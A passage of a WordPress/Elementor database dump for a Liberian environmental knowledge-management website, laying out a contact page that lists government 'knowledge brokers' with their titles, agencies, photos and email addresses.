\\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager-CCCD Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23494,3418,'_elementor_edit_mode','builder'),(23495,3418,'_elementor_template_type','wp-page'),(23496,3418,'_elementor_version','3.0.16'),(23497,3418,'_wp_page_template','default'),(23498,3418,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your 